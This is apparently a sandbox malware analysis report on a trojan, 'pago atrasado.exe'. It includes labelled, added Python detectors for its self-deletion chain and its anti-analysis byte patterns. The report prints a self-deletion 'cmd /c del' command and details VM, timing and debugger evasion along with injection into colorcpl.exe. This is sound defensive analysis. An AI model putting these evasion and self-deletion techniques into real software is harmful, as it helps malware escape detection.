Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579910 NtAdjustPrivilegesToken,LdrInitializeThunk, 16_2_04579910
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045795D0 NtClose,LdrInitializeThunk, 16_2_045795D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045799A0 NtCreateSection,LdrInitializeThunk, 16_2_045799A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579A50 NtCreateFile,LdrInitializeThunk, 16_2_04579A50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579650 NtQueryValueKey,LdrInitializeThunk, 16_2_04579650
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579660 NtAllocateVirtualMemory,LdrInitializeThunk, 16_2_04579660
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045796D0 NtCreateKey,LdrInitializeThunk, 16_2_045796D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045796E0 NtFreeVirtualMemory,LdrInitializeThunk, 16_2_045796E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579710 NtQueryInformationToken,LdrInitializeThunk, 16_2_04579710
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579FE0 NtCreateMutant,LdrInitializeThunk, 16_2_04579FE0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579780 NtMapViewOfSection,LdrInitializeThunk, 16_2_04579780
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457B040 NtSuspendThread, 16_2_0457B040
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579820 NtEnumerateKey, 16_2_04579820
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045798F0 NtReadVirtualMemory, 16_2_045798F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045798A0 NtWriteVirtualMemory, 16_2_045798A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579950 NtQueueApcThread, 16_2_04579950
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579560 NtWriteFile, 16_2_04579560
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457AD30 NtSetContextThread, 16_2_0457AD30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579520 NtWaitForSingleObject, 16_2_04579520
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045799D0 NtCreateProcessEx, 16_2_045799D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045795F0 NtQueryInformationFile, 16_2_045795F0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579670 NtQueryInformationProcess, 16_2_04579670
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579610 NtEnumerateValueKey, 16_2_04579610
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579A10 NtQuerySection, 16_2_04579A10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579A00 NtProtectVirtualMemory, 16_2_04579A00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579A20 NtResumeThread, 16_2_04579A20
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579A80 NtOpenDirectoryObject, 16_2_04579A80
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579770 NtSetInformationFile, 16_2_04579770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457A770 NtOpenThread, 16_2_0457A770
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579760 NtOpenProcess, 16_2_04579760
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457A710 NtOpenProcessToken, 16_2_0457A710
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579B00 NtSetValueKey, 16_2_04579B00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579730 NtQueryVirtualMemory, 16_2_04579730
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0457A3B0 NtGetContextThread, 16_2_0457A3B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045797A0 NtUnmapViewOfSection, 16_2_045797A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B18680 NtReadFile, 16_2_02B18680
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B187B0 NtAllocateVirtualMemory, 16_2_02B187B0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B18700 NtClose, 16_2_02B18700
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B185D0 NtCreateFile, 16_2_02B185D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B186FB NtClose, 16_2_02B186FB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1867A NtReadFile, 16_2_02B1867A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B185CA NtCreateFile, 16_2_02B185CA
Sample file is different than original file name gathered from version info
Source: pago atrasado.exe, 00000000.00000003.244765966.000000000F1B6000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
Source: pago atrasado.exe, 00000001.00000003.248962710.0000000000786000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
Source: pago atrasado.exe, 00000001.00000002.327286991.0000000002973000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamecolorcpl.exej% vs pago atrasado.exe
Source: C:\Users\user\Desktop\pago atrasado.exe File read: C:\Users\user\Desktop\pago atrasado.exe
Source: pago atrasado.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pago atrasado.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Users\user\Desktop\pago atrasado.exe Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pago atrasado.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\pago atrasado.exe File created: C:\Users\user\AppData\Local\Temp\nsb7E27.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@12/5
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar, 0_2_00402053
Source: C:\Users\user\Desktop\pago atrasado.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404292
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\pago atrasado.exe Unpacked PE file: 1.2.pago atrasado.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000A4F5 push ecx; ret 0_2_1000A508
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B87C push eax; ret 1_2_0041B882
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B812 push eax; ret 1_2_0041B818
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B81B push eax; ret 1_2_0041B882
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041C951 push FFFFFFA3h; ret 1_2_0041C955
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00404F18 push edi; retf 1_2_00404F19
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041B7C5 push eax; ret 1_2_0041B818
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A1D0D1 push ecx; ret 1_2_00A1D0E4
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041B87C push eax; ret 1_1_0041B882
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041B812 push eax; ret 1_1_0041B818
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041B81B push eax; ret 1_1_0041B882
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041C951 push FFFFFFA3h; ret 1_1_0041C955
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0458D0D1 push ecx; ret 16_2_0458D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B812 push eax; ret 16_2_02B1B818
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B81B push eax; ret 16_2_02B1B882
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B87C push eax; ret 16_2_02B1B882
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1C951 push FFFFFFA3h; ret 16_2_02B1C955
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B7C5 push eax; ret 16_2_02B1B818
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B04F18 push edi; retf 16_2_02B04F19

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\pago atrasado.exe File created: C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: /c del 'C:\Users\user\Desktop\pago atrasado.exe'
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10008826 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_10008826
Source: C:\Users\user\Desktop\pago atrasado.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
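The self-deletion above is issued by colorcpl.exe, a system binary that explorer.exe started with a bare command line, rather than by the sample itself, so the deleted file never appears in the deleting cmd.exe's ancestor chain. The following is an added example, not from the report: a detector that replays Sysmon Event ID 1 style process-creation records (pid, parent pid, image, command line) and flags exactly that shape. The events are constructed to mirror the report's process tree, with invented PIDs, plus one benign control.

```python
"""Detect a self-deletion chain issued through an injected host process.

Added example, not part of the Joe Sandbox report. The events are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SAMPLE = r"C:\Users\user\Desktop\pago atrasado.exe"

# Constructed events modelled on the report's process tree (PIDs are invented).
EVENTS = [
    ProcEvent(2200, 1500, r"C:\Windows\explorer.exe", "explorer.exe"),  # pre-existing shell
    ProcEvent(4100, 3000, SAMPLE, f"'{SAMPLE}'"),                        # NSIS stub
    ProcEvent(4120, 4100, SAMPLE, f"'{SAMPLE}'"),                        # relaunches itself
    # explorer.exe starts a system binary with no arguments
    ProcEvent(5860, 2200, r"C:\Windows\SysWOW64\colorcpl.exe", r"C:\Windows\SysWOW64\colorcpl.exe"),
    ProcEvent(5900, 5860, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE}'"),
    ProcEvent(5060, 5900, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # benign control: a user deleting a document from an explorer-spawned cmd
    ProcEvent(6000, 2200, r"C:\Windows\System32\cmd.exe", r"/c del C:\Users\user\notes.txt"),
]

# "del [/switches] <path>", path optionally single- or double-quoted
DEL_RE = re.compile(r"""(?i)\bdel\b\s+(?:/[a-z]\s+)*["']?(?P<path>[^"']+?)["']?\s*$""")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(ev: ProcEvent, by_pid: dict, limit: int = 8) -> list:
    """Walk ppid links upward; stops at an unknown parent or after `limit` hops."""
    chain, cur = [], ev
    while cur.ppid in by_pid and len(chain) < limit:
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain


def find_self_delete(events: list) -> list:
    """cmd.exe deleting an executable that was itself observed running.

    If the deleted image is absent from cmd.exe's ancestor chain, the delete was
    issued through some other process, which is how code injection shows up in
    a process tree (here: explorer.exe -> colorcpl.exe -> cmd.exe).
    """
    by_pid = {e.pid: e for e in events}
    known_images = {e.image.lower() for e in events}
    findings = []
    for e in events:
        if basename(e.image) != "cmd.exe":
            continue
        m = DEL_RE.search(e.cmdline)
        if not m:
            continue
        target = m.group("path").strip().lower()
        if target not in known_images:
            continue  # deleting a file that never ran is not this pattern
        chain = ancestors(e, by_pid)
        findings.append({
            "cmd_pid": e.pid,
            "deleted": target,
            "spawned_by": [basename(a.image) for a in chain],
            "deleted_image_in_chain": any(a.image.lower() == target for a in chain),
        })
    return findings


def suspicious_system_spawn(events: list) -> list:
    """PIDs of system-directory binaries that explorer.exe launched with no
    arguments and that then spawned cmd.exe: the hollowed-host shape above."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) != "explorer.exe":
            continue
        img = e.image.lower()
        if not img.startswith(SYSTEM_DIRS) or e.cmdline.strip().lower() != img:
            continue
        if any(basename(c.image) == "cmd.exe" for c in children.get(e.pid, [])):
            hits.append(e.pid)
    return hits


if __name__ == "__main__":
    for f in find_self_delete(EVENTS):
        print("self-delete:", f)
    print("hollowed-host candidates:", suspicious_system_spawn(EVENTS))
```

explorer.exe starting a system binary with no arguments is what a double-click in the Control Panel looks like too, so `suspicious_system_spawn` is only a weak signal on its own; the combination with a cmd.exe child that deletes a previously executed file is what makes the chain worth alerting on.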

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\pago atrasado.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pago atrasado.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002B08604 second address: 0000000002B0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002B0898E second address: 0000000002B08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5660 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 5860 Thread sleep time: -36000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
Source: C:\Users\user\Desktop\pago atrasado.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00405E93 FindFirstFileA,FindClose, 0_2_00405E93
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054BD
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671
Source: explorer.exe, 00000002.00000000.275739014.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.312138109.000000000113D000.00000004.00000020.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.275739014.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.312469410.00000000011B3000.00000004.00000020.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000002.00000000.312469410.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000002.00000000.275782564.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.315993694.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.275782564.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000002.00000000.290685274.0000000008BB0000.00000004.00000001.sdmp Binary or memory string: Prod_VMware_SATA*6
Source: explorer.exe, 00000002.00000000.276079077.0000000008BB0000.00000004.00000001.sdmp Binary or memory string: AProd_VMware_SATA*6

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1000CDA2 IsDebuggerPresent, 0_2_1000CDA2
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100093E8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_100093E8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100098B2 GetProcessHeap, 0_2_100098B2
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004088C0 rdtsc 1_2_004088C0
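The RDTSC interceptor entries in the evasion section give the two rdtsc instructions six bytes apart (0x408604 and 0x40860A) with `xor ecx, ecx; add ecx, eax` between them, the PEB entries that follow are `mov r32, fs:[30h]` reads, and the Data Obfuscation section lists push/ret pairs. The following is an added example, not from the report or the sample: a scanner that encodes those three 32-bit idioms as byte patterns and runs them over a buffer. The buffer is constructed, not dumped from the sample; with a base of 0x408600 it reproduces the report's rdtsc addresses.

```python
"""Byte-pattern scanner for the anti-analysis idioms this report lists.

Added example, not part of the Joe Sandbox report. Patterns are 32-bit x86:
  rdtsc_delta  rdtsc; xor ecx,ecx; add ecx,eax; rdtsc   (timing check)
  peb_fs30     mov r32, fs:[30h]                         (PEB; BeingDebugged is at PEB+2)
  push_ret     push reg/imm; ret|retf                    (push/ret control-flow obfuscation)
"""
import re
from collections import Counter

PATTERNS = {
    # 0F 31 = rdtsc; xor ecx,ecx is 33 C9 or 31 C9; add ecx,eax is 03 C8 or 01 C1
    "rdtsc_delta": re.compile(rb"\x0f\x31(?:\x33\xc9|\x31\xc9)(?:\x03\xc8|\x01\xc1)\x0f\x31", re.DOTALL),
    # 64 A1 disp32 = mov eax, fs:[disp32]; 64 8B /r disp32 = mov r32, fs:[disp32] (modrm rm=101)
    "peb_fs30": re.compile(rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x35\x3d])\x30\x00\x00\x00", re.DOTALL),
    # 50..57 = push r32; 6A ib / 68 id = push imm; C3 = ret, CB = retf
    "push_ret": re.compile(rb"(?:[\x50-\x57]|\x6a.|\x68....)[\xc3\xcb]", re.DOTALL),
}

# Constructed 32-bit code fragment containing each idiom (offsets noted at right).
SAMPLE = (
    b"\x55\x8b\xec\x56"                  # push ebp; mov ebp,esp; push esi
    b"\x0f\x31\x33\xc9\x03\xc8\x0f\x31"  # rdtsc; xor ecx,ecx; add ecx,eax; rdtsc     @+4
    b"\x2b\xc1"                          # sub eax,ecx  (cycle delta)
    b"\x64\xa1\x30\x00\x00\x00"          # mov eax, fs:[30h]                          @+14
    b"\x0f\xb6\x40\x02"                  # movzx eax, byte ptr [eax+2]  (BeingDebugged)
    b"\x64\x8b\x0d\x30\x00\x00\x00"      # mov ecx, fs:[30h]                          @+24
    b"\x50\xc3"                          # push eax; ret                              @+31
    b"\x6a\xa3\xc3"                      # push 0FFFFFFA3h; ret                       @+33
    b"\x57\xcb"                          # push edi; retf                             @+36
    b"\x5e\x5d\xc3"                      # pop esi; pop ebp; ret
)


def scan(buf: bytes, base: int = 0) -> list:
    """Return (kind, virtual_address, matched_bytes) for every hit, in address order."""
    hits = []
    for kind, rx in PATTERNS.items():
        for m in rx.finditer(buf):
            hits.append((kind, base + m.start(), m.group()))
    return sorted(hits, key=lambda h: h[1])


def rdtsc_pairs(buf: bytes, base: int = 0) -> list:
    """(first rdtsc, second rdtsc) addresses; the gap is always 6 bytes for this idiom."""
    return [(addr, addr + 6) for kind, addr, _ in scan(buf, base) if kind == "rdtsc_delta"]


def summary(buf: bytes) -> dict:
    return dict(Counter(kind for kind, _, _ in scan(buf)))


if __name__ == "__main__":
    for kind, addr, raw in scan(SAMPLE, base=0x408600):
        print(f"{addr:08X}  {kind:12s} {raw.hex(' ')}")
    print("rdtsc pairs:", [(hex(a), hex(b)) for a, b in rdtsc_pairs(SAMPLE, 0x408600)])
```

Two caveats when running this on a real image. `fs:[30h]` is the 32-bit PEB pointer, which fits this sample (the report marks it as a 32-bit PE and the host is the SysWOW64 colorcpl.exe); 64-bit code reads `gs:[60h]` instead. The report's push/ret entries give the function start and the address of the ret, which need not be adjacent, so the tight `push_ret` pattern undercounts those, while a bare `50 C3` also occurs in data, so restrict the scan to executable sections and treat that family as corroboration rather than as a verdict on its own.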
Enables debug privileges
Source: C:\Users\user\Desktop\pago atrasado.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\colorcpl.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A402 mov eax, dword ptr fs:[00000030h] 0_2_1001A402
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A616 mov eax, dword ptr fs:[00000030h] 0_2_1001A616
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A6C7 mov eax, dword ptr fs:[00000030h] 0_2_1001A6C7
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A706 mov eax, dword ptr fs:[00000030h] 0_2_1001A706
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_1001A744 mov eax, dword ptr fs:[00000030h] 0_2_1001A744
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A090AF mov eax, dword ptr fs:[00000030h] 1_2_00A090AF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C9080 mov eax, dword ptr fs:[00000030h] 1_2_009C9080
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FF0BF mov ecx, dword ptr fs:[00000030h] 1_2_009FF0BF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FF0BF mov eax, dword ptr fs:[00000030h] 1_2_009FF0BF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009FF0BF mov eax, dword ptr fs:[00000030h] 1_2_009FF0BF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A43884 mov eax, dword ptr fs:[00000030h] 1_2_00A43884
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A43884 mov eax, dword ptr fs:[00000030h] 1_2_00A43884
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h] 1_2_009F20A0
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C58EC mov eax, dword ptr fs:[00000030h] 1_2_009C58EC
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A5B8D0 mov eax, dword ptr fs:[00000030h] 1_2_00A5B8D0
